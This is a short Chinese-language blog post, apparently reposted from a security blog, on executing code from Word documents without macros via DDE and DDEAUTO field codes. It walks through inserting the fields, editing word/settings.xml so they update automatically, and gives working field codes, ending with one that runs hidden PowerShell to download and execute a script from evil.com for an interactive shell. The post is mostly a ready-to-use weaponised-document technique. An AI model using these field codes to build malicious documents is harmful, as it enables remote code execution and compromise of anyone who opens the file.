今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。
首先新建一个word文档,然后插入域:
选择 = (Formula)
右键,切换域代码
代码处修改为
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
之后,右键更新域,再把文档改成docx格式即可。最终效果如下:
比较鸡肋的是点是以后才会执行。
除了使用DDEAUTO,使用DDE也是可以的,具体如下:
{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
需要注意的是,使用DDE不会自动执行,需要对文档进行修改,将文档重命名为rar,打开以后修改 word/settings.xml,添加
<w:updateFields w:val="true"/>
个人感觉使用DDE效果更好点。
如何获取交互式shell ?
{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}
文章出处:Evi1cg's blog
原文链接:
https://evi1cg.me/archives/MSWord_Code_Exec_Without_Macro.html
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650460007&idx=3&sn=b2425fdd8ef20c7c8726cdd9f238deec&chksm=83bbaa83b4cc239503ca6d1855469ac5c68c8c14e38c34ebd73105d1b2ff28cec59befad380e#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh